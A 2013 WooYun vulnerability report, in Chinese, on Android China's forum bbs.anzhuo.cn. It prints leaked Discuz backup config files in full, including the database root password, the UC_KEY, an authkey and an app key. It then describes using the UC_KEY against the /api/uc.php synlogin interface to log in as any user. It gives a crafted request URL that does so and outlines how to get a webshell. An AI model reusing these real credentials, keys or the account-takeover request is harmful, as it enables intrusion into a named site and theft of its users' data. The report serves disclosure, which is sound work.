当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-043375

漏洞标题:敏感信息泄露#安卓中国敏感信息泄露导致197万用户信息危急

相关厂商:安卓中国

漏洞作者: 贱心

提交时间:2013-11-19 18:23

修复时间:2014-01-03 18:23

公开时间:2014-01-03 18:23

漏洞类型:重要敏感信息泄露

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-11-19: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-01-03: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

敏感信息泄露#安卓中国敏感信息泄露导致197万用户信息危急

详细说明:

http://bbs.anzhuo.cn/config/config_ucenter.php.bak
http://bbs.anzhuo.cn/config/config_global.php.bak

<?php
define('UC_CONNECT', 'mysql');
define('UC_DBHOST', 'localhost');//192.168.1.40
define('UC_DBUSER', 'root');
define('UC_DBPW', 'anzhuo');
define('UC_DBNAME', 'anzhuotest');//anzhuouucenter
define('UC_DBCHARSET', 'gbk');
define('UC_DBTABLEPRE', '`anzhuotest`.pre_ucenter_');//`anzhuouucenter`.pre_ucenter_
define('UC_DBCONNECT', 0);
define('UC_CHARSET', 'gbk');
define('UC_KEY', 'W8d5oe47o2oa63DcT7q7AdXbO4e7m3o8J3FfV4y90fi9Y3E7Set7Y0tfn91dmeXa');
define('UC_API', 'http://www.anzhuo.cn/uc_server');
define('UC_APPID', '1');
define('UC_IP', '127.0.0.1');
define('UC_PPP', 20);


<?php
$_config = array();
// ---------------------------- CONFIG DB ----------------------------- //
$_config['db']['1']['dbhost'] = '192.168.1.36';//192.168.1.40
$_config['db']['1']['dbuser'] = 'root';
$_config['db']['1']['dbpw'] = 'anzhuo';
$_config['db']['1']['dbcharset'] = 'gbk';
$_config['db']['1']['pconnect'] = '1';
$_config['db']['1']['dbname'] = 'anzhuotest';
$_config['db']['1']['tablepre'] = 'pre_';
$_config['db']['common']['slave_except_table'] = '';
// -------------------------- CONFIG MEMORY --------------------------- //
$_config['memory']['prefix'] = 'wvuLeb_';
$_config['memory']['eaccelerator'] = 0;
$_config['memory']['xcache'] = 0;
$_config['memory']['memcache']['server'] = '192.168.1.36';//192.168.1.40
$_config['memory']['memcache']['port'] = 11211;
$_config['memory']['memcache']['pconnect'] = 1;
$_config['memory']['memcache']['timeout'] = 1;
$_config['memory']['apc'] = 0;
// -------------------------- CONFIG SERVER --------------------------- //
$_config['server']['id'] = 1;
// ------------------------- CONFIG DOWNLOAD -------------------------- //
$_config['download']['readmod'] = 2;
$_config['download']['xsendfile']['type'] = '0';
$_config['download']['xsendfile']['dir'] = '/down/';
// --------------------------- CONFIG CACHE --------------------------- //
$_config['cache']['type'] = 'file';
// -------------------------- CONFIG OUTPUT --------------------------- //
$_config['output']['charset'] = 'gbk';
$_config['output']['forceheader'] = 1;
$_config['output']['gzip'] = '0';
$_config['output']['tplrefresh'] = 1;
$_config['output']['language'] = 'zh_cn';
$_config['output']['staticurl'] = 'static/';
$_config['output']['ajaxvalidate'] = '0';
$_config['output']['iecompatible'] = '0';
// -------------------------- CONFIG COOKIE --------------------------- //
$_config['cookie']['cookiepre'] = 'a2Lk_';
$_config['cookie']['cookiedomain'] = '.anzhuo.cn';
$_config['cookie']['cookiepath'] = '/';
// ------------------------- CONFIG SECURITY -------------------------- //
$_config['security']['authkey'] = 'fccf381Lz76houW7';
$_config['security']['urlxssdefend'] = 1;
$_config['security']['attackevasive'] = '0';
$_config['security']['querysafe']['status'] = 1;
$_config['security']['querysafe']['dfunction']['0'] = 'load_file';
$_config['security']['querysafe']['dfunction']['1'] = 'hex';
$_config['security']['querysafe']['dfunction']['2'] = 'substring';
$_config['security']['querysafe']['dfunction']['3'] = 'if';
$_config['security']['querysafe']['dfunction']['4'] = 'ord';
$_config['security']['querysafe']['dfunction']['5'] = 'char';
$_config['security']['querysafe']['daction']['0'] = 'intooutfile';
$_config['security']['querysafe']['daction']['1'] = 'intodumpfile';
$_config['security']['querysafe']['daction']['2'] = 'unionselect';
$_config['security']['querysafe']['daction']['3'] = '(select';
$_config['security']['querysafe']['dnote']['0'] = '/*';
$_config['security']['querysafe']['dnote']['1'] = '*/';
$_config['security']['querysafe']['dnote']['2'] = '#';
$_config['security']['querysafe']['dnote']['3'] = '--';
$_config['security']['querysafe']['dnote']['4'] = '"';
$_config['security']['querysafe']['dlikehex'] = 1;
$_config['security']['querysafe']['afullnote'] = 1;
// -------------------------- CONFIG ADMINCP -------------------------- //
// -------- Founders: $_config['admincp']['founder'] = '1,2,3'; --------- //
$_config['admincp']['founder'] = '1';
$_config['admincp']['forcesecques'] = '0';
$_config['admincp']['checkip'] = 1;
$_config['admincp']['runquery'] = 1;
$_config['admincp']['dbimport'] = 1;
// -------------------------- CONFIG REMOTE --------------------------- //
$_config['remote']['on'] = '0';
$_config['remote']['dir'] = 'remote';
$_config['remote']['appkey'] = '62cf0b3c3e6a4c9468e7216839721d8e';
$_config['remote']['cron'] = '0';
//附件文件下载地址为:后台=》全局=》上传设置=》本地附件 URL 地址
//附件图片地址
$_config['attachimageurl']='http://img.3g.cn/anzhuo/data/attachment/';//apk.anzhuo.cn/data/attachment/
//头像显示地址
$_config['avatarurl']='http://www.anzhuo.cn/uc_server/';//www.anzhuo.cn/uc_server/
// ------------------- THE END -------------------- //
?>

漏洞证明:

没找到数据库外网ip 而且也很可能不可外连
那么这里我们利用uc_key
有了uc_key 我们可以直接获取getshell的
参考: WooYun: 敏感信息泄露#动漫东东敏感信息泄露导致100万+用户信息可被脱裤
可惜简单的getshell方法失败,另一个getshell方法比较麻烦
那我们来试试利用uc_key进任意用户账号吧
文件:/api/uc.php
我们利用这里的接口:synlogin
代码片段:

function synlogin($get, $post) {
global $_G;
if(!API_SYNLOGIN) {
return API_RETURN_FORBIDDEN;
}
header('P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"');
$cookietime = 31536000;
$uid = intval($get['uid']);
if(($member = getuserbyuid($uid, 1))) {
dsetcookie('auth', authcode("$member[password]\t$member[uid]", 'ENCODE'), $cookietime);
}
}


利用脚本略过
利用api进入任意用户:

http://bbs.anzhuo.cn/api/uc.php?code=8f76D6txUKXpTJV571iAy5BZbTUBP%2BFzouNzXVOTEe3qNDOoNnhRvBE8LT7kr0v%2BShnMQywzGTV2U2bY7By2mPHjEbyCzbJewxtJQbHDPcp9b5hZP72unXUYMFc


QQ截图20131119181413.jpg


QQ截图20131119181533.jpg


还可以利用uc_key拿webshell
方法:改管理员密码(本地搭建个discuz,利用uc_key修改anzhuo.cn管理员的密码) 进后台拿webshell
安卓中国有197万+用户

QQ截图20131119181843.jpg

修复方案:

null

版权声明:转载请注明来源 贱心@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝